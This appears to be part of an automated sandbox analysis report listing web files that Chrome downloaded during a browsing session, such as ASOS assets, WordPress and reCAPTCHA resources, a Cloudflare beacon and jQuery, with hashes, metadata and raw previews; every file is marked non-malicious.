                                                                                                                                                                                                                                                                  Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([[546],{62476:(e,t,n)=>{n.d(t,{Z:()=>o});const o={close:"osdMOxg nJoGg3s"}},66023:(e,t,n)=>{n.d(t,{Z:()=>o});const o={Facebook:"J8Sftp9",Instagram:"mbXMayF",Snapchat:"CDRgBJC",Vk:"ZNHON6r"}},93819:(e,t,n)=>{n.d(t,{Z:()=>o});const o={deleteItem:"iWftf0U",deleteItemIcon:"ANCLgSx XmGonBy"}},81566:(e,t,n)=>{n.d(t,{Z:()=>o});const o={container:"oCe7D_L",product:"JWX9giR",voucher:"LKuNB8y",link:"e_Ko7LM EVhxZk8 leavesden2",image:"hK_95HO",details:"dLwsYMN ZHWKoMf leavesden3",price:"EmQ8iyH",item:"Je6Smy_",name:"ZlDAIIp",subscription:"RcMrzfR",meta:"fRrEDSy",colour:"ji3ec_g",size:"z3Jlz7A",quantity:"fv6LRW4",srOnly:"kTiVPVf AQi6YMD"}},46421:(e,t,n)=>{n.d(t,{Z:()=>o});const o={container:"_8m5CpA",current:"vx3UDYg TNLlZ7K london3",highlight:"IyFDfqo",previous:"p76OcV_ sOoULa1 leavesden4",rrp:"E6qPMvE sOoULa1 leavesden4",rrpLabel:"MRDNoo1"}},98438:(e,t,n)=>{n.d(t,{Z:()=>o});const o={pageOverlay:"sC6a41z",side:"uZHyLwH",fadeI
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):2438
                                                                                                                                                                                                                                                                  Entropy (8bit):7.883569731212677
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:N1jg47QuDeR7PoiVtoZ2XwmSfLQ3yHnNe/HNyyDo0GnRn+Ekpq:N1jg47Z6LoiUZOuDHnNe/tyao0GnAbc
                                                                                                                                                                                                                                                                  MD5:E6FBABBCD80570A9DFA0386C25FA2C08
                                                                                                                                                                                                                                                                  SHA1:D6B62AE10B83FE728788BCC00ED362847E1DF566
                                                                                                                                                                                                                                                                  SHA-256:B7731EE671044B5581899B859A98227365A32ADBBBCDDF652BBDBED8E4F0DFDE
                                                                                                                                                                                                                                                                  SHA-512:A80A7564C7280C0F3FE96FA0A697DD4C48394B0DF3C4B5F187D19EED07FAB3D35879F423B72A069963478B833E54C6555C18D7AF951384F2D48CC5E6412CCE52
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://assets.asosservices.com/storesa/images/flags/dk.png
                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR...P...P............sRGB........@IDATx...oTU...s.`ZZZZ..@.%...&,L}DP4.PcpK.nt.....n\.H\..H.....G....4..."H.BK[.....e~....{g.)3.G...<~..{^s..\F.f.k.?....t....777.N.:...3!.{Y.IO..fI.j.....R..H.K...../.....3..699..........333[.\Q..l}*.c.9.@..K..vi..+....f"E.A.... .|..RX..............&..Y.r.$..._kk.x.'.$..9.%P2Z..7..iY..eeV..-!.s.....Y...2...'.%3......W...'o.......&...].........b./qW..K.-(.Y.:. ..\.c..I..../o..7.'..|-_k.pH.h;%.....p...o.....Gz{{...E@T..iQ:.j9.T....k..d....N6.^......;O..s.....f....Jww.p..J.Z...SZ*..f.*."...|~...c.}..*$./ep...nJ..!........o.~.....j..SW....H...>i.n.|.g0\%..+..)}$w>>".?...j.*..A.|x1...A. ....._...O.^m....E.h}W....L.......Fur.:.-_.~.<>>..>.+>.;..Ri......z....&$.....^+Iu...*...x.......-h.$....}....of$3.#.Y.+u.d~9.P....hA.......^....93...-.&8.&Mq.\6....hA.........tFd.s.[.O.2.nA...eX4..MhCc........9......n.5..~BMz... .5j.X. -.a9..n[*`...fhB...h..:..xP..b....i...........hZW.jM...r@.V...:......M...t%..h.ch.~".>
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):43
                                                                                                                                                                                                                                                                  Entropy (8bit):3.0950611313667666
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:CUMllRPQEsJ9pse:Gl3QEsJLse
                                                                                                                                                                                                                                                                  MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                                                                                                                                                                                                                                  SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                                                                                                                                                                                                                                  SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                                                                                                                                                                                                                                  SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://pixel.wp.com/t.gif?is_current_user_blog_owner=false&_en=wpcom_marketing_bar_impression&_ui=17YqG79Brj34dSgrHP4bzBgK&_ut=anon&_ts=1730228981995&_tz=4&_lg=en-US&_pf=Win32&_ht=1024&_wd=1280&_sx=0&_sy=0&_dl=https%3A%2F%2Fdartergary.wordpress.com%2F&_dr=&blog_id=238502921&blog_tz=-4&user_lang=en&blog_lang=en&user_id=0&_rt=1730228981996&_=_
                                                                                                                                                                                                                                                                  Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x100, components 3
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):6099
                                                                                                                                                                                                                                                                  Entropy (8bit):7.9133745255158905
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:yEvaNh9uhqV6nvY12dDgLaOREJnyp/+1ptk+x7dsvv8NrrqIymnO3NNG1dEqdkia:yUaLhYYQli/+3avgqIDQDG1HdkiZLVJI
                                                                                                                                                                                                                                                                  MD5:BEA11CF813FB2842622154D9F736C768
                                                                                                                                                                                                                                                                  SHA1:BB2C2D44052DD1495E794CD3C8E0CFE4BC9B8C42
                                                                                                                                                                                                                                                                  SHA-256:5B1AE877A66A4D4840C95AB34253A6DA1FF07C58616BA32718DC78E47A90DC75
                                                                                                                                                                                                                                                                  SHA-512:82FD4B0F6C0CC349C3BFA41F459F4E980AF5ECD934E55AE4EF933714BA13932989CD121BA6FF3E3661FBA120F6F19ABEC3C229F1861990217EE2B85E9751122F
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://www.google.com/recaptcha/api2/payload?p=06AFcWeA4blY5MVPIuxvSqI2F8cJcTKI2jykD8dKcYCKNyJQdUqY-SQpdKOMdYDiVMy4PmaNToi6BkEpkYn5Zl4Gtipty5tV9tppOBZgn-Pgvikm2gLFlilOhjl2gYxwcbr39AqOMgA0M752LSRhzi28wHTsBKKrDYHyZwev37Obyl2ymyAWoy6C_LXFsPc9tyfe9W6qCDaYfwhprtiyWI7IdDeYk-gjLmVg&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=34d5e020329daa00
                                                                                                                                                                                                                                                                  Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................d.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.......I.og....7D..o.h;....:...6.n/.[..P>.m.|...a~..g9...y..}2....Z.h.a.fy....$..z...u.-........q.Y.........q.X(.o........M....[./.........[..[)..N2....VF;.!ulH..U..#b.)....v..3.F$.!!.h...<..0OB9...d..EvO1.f,..t......S[..i..;5o.....d..(.eU...x;..c...:s..}...IY..i.N.<...2H.=...F.9.'..}....C.r..6.q.oJh..DNf..l0....>rK...~4..V..K.C.bGEu@.D.YH;rq.S....e..7...
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 6 x 5
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):50
                                                                                                                                                                                                                                                                  Entropy (8bit):3.8488255736198
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:CN+ltRPQEsJen2sSX:xvQEsJ42sSX
                                                                                                                                                                                                                                                                  MD5:E4D673A55C5656F19EF81563FB10884C
                                                                                                                                                                                                                                                                  SHA1:1F2D8ED221D39329251AD3A6FF1EDB20B7219443
                                                                                                                                                                                                                                                                  SHA-256:F3A8992ACB9AB911E0FA4AE12F4B85EF8E61008619F13EE51C7A121FF87F63B1
                                                                                                                                                                                                                                                                  SHA-512:E0B03411282A979CF772F700D9E5634B0C25C612E380AD33C0D59059B1B479D027016D5BEB148403EF185430DB35F5FAED362F36CE2C8ECAD0E6D8E30CEA97B4
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:GIF89a.............!.......,............bx..j....;
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x100, components 3
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):3891
                                                                                                                                                                                                                                                                  Entropy (8bit):7.895169935107539
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:IvmuERAvMtleG1KE6WBi93/Cl2y/Tppho7+zn87Bw3BMDAHvqQ4o1uz7qI1a:yESMQOY9PupphTz0BQPb4wy3c
                                                                                                                                                                                                                                                                  MD5:C82C26090F319798C7BDB14A510E2CA7
                                                                                                                                                                                                                                                                  SHA1:0C4A68834FA028B655347D9A49EA8AD243E6DDDF
                                                                                                                                                                                                                                                                  SHA-256:491B43BD2483473FDF6C8F0B5A399D5CA88DA154C4DD576BB01C4FCC50BFB12A
                                                                                                                                                                                                                                                                  SHA-512:8C7CBE60BDB4DEE4E9E7D855AF1CDB46B243916100976046F73E558391B6654B88C511D7E82D74F8A9E1B2A921B4697835A981E0531706381FE0C698191C8946
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................d.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...|@...=8K&...0....V'....^.j.=.3.m-....1...q.k.[./m.RXm..R.I...,O^..._.....5.Z....8.h.......)....Ts...u...:M.KW...2%....2....cS..>."...g....{k.Rh\mdu..](....f......}.\.V.(......,$@x.0F>.....3F..e......^..@.t.o.F..;..e..\.g...].8...rx........k:V......%.;..2.9b.....;.(6......oxR....[.-f{..!e3%.S..I.9R..Nq..{...m7M....C.5.K.....p@.e.......\.z.....}.....
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (701)
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):558800
                                                                                                                                                                                                                                                                  Entropy (8bit):5.6661858145390775
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12288:HHe/N32Dr0RnSXaKyEtG76ZKj1wa89jzQoDjU3+VLs/k5lS64cflFT3O01d:eMapiBMKZxRflF3d
                                                                                                                                                                                                                                                                  MD5:88A5FED5C87B1D3704AB225CFBE7A130
                                                                                                                                                                                                                                                                  SHA1:D64243C18FBAA356E4ABAE8414CCC4772D64060B
                                                                                                                                                                                                                                                                  SHA-256:F8E5F5CE9FF44073CFF24BCD3D2B8AA4E67B67891B14FF929FE4743880FDF82E
                                                                                                                                                                                                                                                                  SHA-512:8B8D1C9F4C36FD2383C96D0D484A6692F70422934BCCD3DB1F0787E1B753F7D5A8F0C91934805C4D865AED3D4673FF478F0AE23746D0C0E005E60848543B3D33
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var k=function(){return[function(n,S,D,d,Z,l,h,R,O){return(((n^53)&19)==((n&((((R=[34,2,46],n|72)==n&&(O=St(function(G,A,L){return L=(A=(G=function(f,H){return(f[(H=["replace","indexOf","trim"],H)[1]](d)!=-1&&(f=f.slice(f[H[1]](d))),f)[H[0]](/\s+/g,S)[H[0]](/\n/g,Z)[H[2]]()},G(Z+l)),G(Z+h)),A==L},D)),n)|56)==n&&(h=["https","",0],D=="*"?O="*":(d=g[R[2]](24,!0,h[1],new OI(D)),l=N[30](58,d,h[1]),Z=N[36](25,h[1],g[40](40,l,h[1]),v[21](R[1],1,S,D)),Z.D!=S||(Z.A==h[0]?E[30](90,h[R[1]],443,Z):Z.A=="http"&&.E[30](96,h[R[1]],80,Z)),O=Z.toString())),11))==n&&b.call(this,S),1)&&(O=x[42](16,C[42](44,v[R[0]](23,12),S),[u[20](3
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (2395), with no line terminators
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):2395
                                                                                                                                                                                                                                                                  Entropy (8bit):4.81324254529679
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:6PTWxeJPRDkASsmTHT8cL4eZPMryhwcZq484niHxHc1AVg1dcqdsJVCAME5Z2Nbp:4y4FRpQS5Nc1MqbQXGR
                                                                                                                                                                                                                                                                  MD5:F2735438C3644F881034553E528AD175
                                                                                                                                                                                                                                                                  SHA1:9CB05082628DBDBC6C1574D4EFE4922765BF5EC1
                                                                                                                                                                                                                                                                  SHA-256:7D24C9900B5EF00D793E5E014A8EC3FB5F7279003B6D24C56172BACDB32DAB4C
                                                                                                                                                                                                                                                                  SHA-512:C351F5A78F8D319DDDB01C0DB60C8FE8C6B88F5125ADDDDECB5CE243911ADF88AF2238B49EA4EB8F48DF06CDF09018FBB032F18BCA72F417BF8DC01480A5CA0F
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://s1.wp.com/_static/??-eJzTLy/QTc7PK0nNK9HPLdUtyClNz8wr1i9KTcrJTwcy0/WTi5G5ekCujj52Temp+bo5+cmJJZn5eSgc3bScxMwikFb7XFtDE1NLExMLc0OTLACohS2q&cssminify=yes
                                                                                                                                                                                                                                                                  Preview:.reblogger-note img.avatar{float:left;padding:0;border:0}.reblogger-note-content{margin:0 0 20px}.wpcom-reblog-snapshot .reblog-from img{margin:0 .75em 0 0;padding:0;border:0}.wpcom-reblog-snapshot .reblogger-note img.avatar{float:left;padding:0;border:0;margin:0 .5em 0 0}.wpcom-reblog-snapshot{margin-bottom:1em}.wpcom-reblog-snapshot p.reblog-from{margin:0 0 1em}.wpcom-reblog-snapshot p.reblogger-headline{line-height:32px;margin:0 0 1em}.wpcom-reblog-snapshot .reblogged-content{margin:0 0 1em}.reblog-post .wpcom-enhanced-excerpt-content{border-left:3px solid #eee;padding-left:15px}.reblog-post ul.thumb-list{display:block;list-style:none;margin:2px 0;padding:0;clear:both}.reblog-post ul.thumb-list li{display:inline;margin:0;padding:0 1px;border:0}.reblog-post ul.thumb-list li a{margin:0;padding:0;border:0}.reblog-post ul.thumb-list li img{margin:0;padding:0;border:0}.reblog-post .wpcom-enhanced-excerpt{clear:both}.reblog-post .wpcom-enhanced-excerpt address,.reblog-post .wpcom-enhanced
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):665
                                                                                                                                                                                                                                                                  Entropy (8bit):7.42832670119013
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:6v/7OEUelyuRs56fyKgIEInu5VLJBZInmJhd/3VqQXD8GBm1:belFRs56fuIEIu5VNBZInMTICfBO
                                                                                                                                                                                                                                                                  MD5:07BF314AAB04047B9E9A959EE6F63DA3
                                                                                                                                                                                                                                                                  SHA1:17BEF6602672E2FD9956381E01356245144003E5
                                                                                                                                                                                                                                                                  SHA-256:55EAF62CB05DA20088DC12B39D7D254D046CB1FD61DDF3AE641F1439EFD0A5EE
                                                                                                                                                                                                                                                                  SHA-512:2A1D4EBC7FBA6951881FD1DDA745480B504E14E3ADAC3B27EC5CF4045DE14FF030D45DDA99DC056285C7980446BA0FC37F489B7534BE46107B21BD43CEE87BA0
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR...0...0.......1.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........IDATX..W..DA.=.6O...H.,E.............b.....C.1...1..EbLPI.W......H..s.z5.:..._.d.0.u.......j.x.R..._.v..R...1..ir..`.yn..R..j.h./y..l......(`..5....l.E..0......B^......F.....F....Y|p..._,p.............(3^.r.P.O......;<....z.,..yF....N..x.MS...Q.C%......D8G.+......oOk...)T..}|..e...G.....'.R..G.Z.T}7(...&..@...G....$PGYv...A.c.]d....N..'.4b...R.%..)2Yd..b.M..^@.M....^.:h.N(dP*t..RQ%.o...{.vGH..S._".@./...g.....]...?..h..E.,r.m.%."."W.6G..t...->....q\.Kc.t"^......Kj~{l..C..).y..><@|yB....=c.............!...<....IEND.B`.
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (19948), with no line terminators
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):19948
                                                                                                                                                                                                                                                                  Entropy (8bit):5.261902742187293
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:384:XriNpnjyMkg8XMtExRN1w29JIOzahXtO2nJ65:GijgSWuanfJ65
                                                                                                                                                                                                                                                                  MD5:EC18AF6D41F6F278B6AED3BDABFFA7BC
                                                                                                                                                                                                                                                                  SHA1:62C9E2CAB76B888829F3C5335E91C320B22329AE
                                                                                                                                                                                                                                                                  SHA-256:8A18D13015336BC184819A5A768447462202EF3105EC511BF42ED8304A7ED94F
                                                                                                                                                                                                                                                                  SHA-512:669B0E9A545057ACBDD3B4C8D1D2811EAF4C776F679DA1083E591FF38AE7684467ABACEF5AF3D4AABD9FB7C335692DBCA0DEF63DDAC2CD28D8E14E95680C3511
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015
                                                                                                                                                                                                                                                                  Preview:!function(){var e={343:function(e){"use strict";for(var t=[],n=0;n<256;++n)t[n]=(n+256).toString(16).substr(1);e.exports=function(e,n){var r=n||0,i=t;return[i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]]].join("")}},944:function(e){"use strict";var t="undefined"!=typeof crypto&&crypto.getRandomValues&&crypto.getRandomValues.bind(crypto)||"undefined"!=typeof msCrypto&&"function"==typeof window.msCrypto.getRandomValues&&msCrypto.getRandomValues.bind(msCrypto);if(t){var n=new Uint8Array(16);e.exports=function(){return t(n),n}}else{var r=new Array(16);e.exports=function(){for(var e,t=0;t<16;t++)0==(3&t)&&(e=4294967296*Math.random()),r[t]=e>>>((3&t)<<3)&255;return r}}},508:function(e,t,n){"use strict";var r=n(944),i=n(343);e.exports=function(e,t,n){var o=t&&n||0;"string"==typeof e&&(t="binary"===e?new Array(16):null,e=null);var a=(e=e||{}).random||(e.rng||r)();if(
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (10125)
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):15575
                                                                                                                                                                                                                                                                  Entropy (8bit):5.385259463868097
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:384:H7qSPnIG1yrZAZVj34uTmX5ToHDAu/zo0j6SYlIfBIN9WMxtComqJACCN:HZPnIGgrZAZVj3XU4ASzo05BIN9WMGF9
                                                                                                                                                                                                                                                                  MD5:10F88843A3C699872A9C7EA0036F093D
                                                                                                                                                                                                                                                                  SHA1:1A237FE89B282A2528C167DB50289B77A036EAA9
                                                                                                                                                                                                                                                                  SHA-256:168088186C150D04871D7BC9E98EE9BAE60269F9F45005ABDF7803BBFAAC7245
                                                                                                                                                                                                                                                                  SHA-512:536F94ED791D2B65D8BB993BE1A6DB9C688255460E0204DD1D4B5219DD1A00AF3C90460D66561F446DD4B3E4DFDD3266036790CC5467D01E4BE307DD1B436EF1
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:"https://s0.wp.com/_static/??/wp-content/js/rlt-proxy.js,/wp-content/mu-plugins/jetpack-plugin/sun/jetpack_vendor/automattic/jetpack-videopress/build/lib/token-bridge.js?m=1724856138j"
                                                                                                                                                                                                                                                                  Preview:// listen for rlt authentication events and pass them to children of this document..( function() {..var currentToken;..var parentOrigin;..var iframeOrigins;..var registeredIframes = [];..var initializationListeners = [];..var hasBeenInitialized = false;..var RLT_KEY = 'jetpack:wpcomRLT';...// should we inject RLT into this iframe?..function rltShouldAuthorizeIframe( frameOrigin ) {...if ( ! Array.isArray( iframeOrigins ) ) {....return false;...}...return iframeOrigins.includes( frameOrigin );..}...function rltInvalidateWindowToken( token, target, origin ) {...if ( target && typeof target.postMessage === 'function' ) {....try {.....target.postMessage( JSON.stringify( {......type: 'rltMessage',......data: {.......event: 'invalidate',.......token: token,.......sourceOrigin: window.location.origin,......},.....} ), origin );....} catch ( err ) {.....return;....}...}..}.../**.. * PUBLIC METHODS.. */..window.rltInvalidateToken = function( token, sourceOrigin ) {...// invalidate in current co
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:C source, ASCII text, with very long lines (65098)
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):213725
                                                                                                                                                                                                                                                                  Entropy (8bit):5.361679936162521
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3072:z63NGm+mJgNeQQi8iqGHIKnJUtpT+BsbNLZ9ip0q:INGmYaGH5Urcso0q
                                                                                                                                                                                                                                                                  MD5:F1D54743DBCC9A03EB08F14D0DE65DA4
                                                                                                                                                                                                                                                                  SHA1:16B96431016B503517462F0797901AD8DAC94481
                                                                                                                                                                                                                                                                  SHA-256:4E973E1B8E6B798931086CF372B83E40C417E33C0922087DAD0EB2F89FA891AC
                                                                                                                                                                                                                                                                  SHA-512:209CC5643F2EFEB7E0EDD8CF015FCFF122BC355FE89694650A0CE7761FA1B22284A26CE218FE6A5337E9DCA6F7704A7AE523B997413338FF98AE10FC54804736
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:/*. * Copyright (c) 2011, Yahoo! Inc. All rights reserved.. * Copyright (c) 2011-2012, Log-Normal, Inc. All rights reserved.. * Copyright (c) 2012-2017, SOASTA, Inc. All rights reserved.. * Copyright (c) 2017-2022, Akamai Technologies, Inc. All rights reserved.. * Copyrights licensed under the BSD License. See the accompanying LICENSE.txt file for terms.. */./* Boomerang Version: 1.766.0 c28975a504c1aa46de14fe358f4875ace2917401 */..BOOMR_start=(new Date).getTime();function BOOMR_check_doc_domain(e){if(window){if(!e){if(window.parent===window||!document.getElementById("boomr-if-as"))return;if(window.BOOMR&&BOOMR.boomerang_frame&&BOOMR.window)try{BOOMR.boomerang_frame.document.domain!==BOOMR.window.document.domain&&(BOOMR.boomerang_frame.document.domain=BOOMR.window.document.domain)}catch(t){BOOMR.isCrossOriginError(t)||BOOMR.addError(t,"BOOMR_check_doc_domain.domainFix")}e=document.domain}if(e&&-1!==e.indexOf(".")&&window.parent){try{window.parent.document;return}catch(t){try{document
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x100, components 3
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):5893
                                                                                                                                                                                                                                                                  Entropy (8bit):7.908596422163363
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:yEjS+972zZtnHzeOqT039gA7NLf0YwGQDc4weRwGRHQby+3oj:yV+9yzTzeOr6A7NL8BLc4wgwQQ2h
                                                                                                                                                                                                                                                                  MD5:9DADD5C1965AB4BC2363057E8722D279
                                                                                                                                                                                                                                                                  SHA1:97EFCA7F0C164BAC07A8460755F47EFA5872432C
                                                                                                                                                                                                                                                                  SHA-256:867F06D914DFB413127897B342548F58C0BDC64D4E91DFA72AF2B3E8DA10D313
                                                                                                                                                                                                                                                                  SHA-512:42518D4CE833302A061A5154BA9B9417F25DAAECD6E2A6873114A863F81E67EB7B2BD4F2C141C5A180CC54346126C2F608DF57D138716EF10C9B36FB6D6E5F00
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................d.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.-|s.{....IuKviK.......`..q...}tt..".V.'..5+....=....R......x..5.Q..h..W...3.....E...l.T..T6NG..L.g...."iY;t.F).=.c..V.5in.!...f.69....q..H.O.@.qI..,.p...Aj.c...5.,...G^...sj.q.^j..9,.W..*.....V...a...x..x.1..VM...O_..o.t......1,"m.......=n[h.[nt.].q..w...p..e.:.kH.....'\.2..eV.m..A..9.<..p....A.....=...nU..9...,q..3.^.km...i....c....1`..s...+x.
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65487)
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):96951
                                                                                                                                                                                                                                                                  Entropy (8bit):5.288734807332958
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:NGIA2Bi9gxoGtW+Y2XBbx60BW7VB3P0o7UUGoQR3zbOsEwO3Vjq5Bk2PtVHMgT8T:Nmx8UZ2El4Fif71UXXg
                                                                                                                                                                                                                                                                  MD5:E3E296E62F9ED48D9690B85B37CF7D2C
                                                                                                                                                                                                                                                                  SHA1:57E75BCA4B8F9B6F9DF995A7545C21EC39034B34
                                                                                                                                                                                                                                                                  SHA-256:0FD839C7A31E4EDC02934504F4588F468F021922519694AB4F821CB483B88E85
                                                                                                                                                                                                                                                                  SHA-512:12A6B54D206E52C7E173100FF2BF73D4B6B7CE84E6AA030EA7A8A1FEDD09D764F4BC4778E8BD8F523208B1D951E3FCB2197FB3459FFD340B5638001097EC4F4A
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://assets.asosservices.com/shared/jquery.742e47af.js
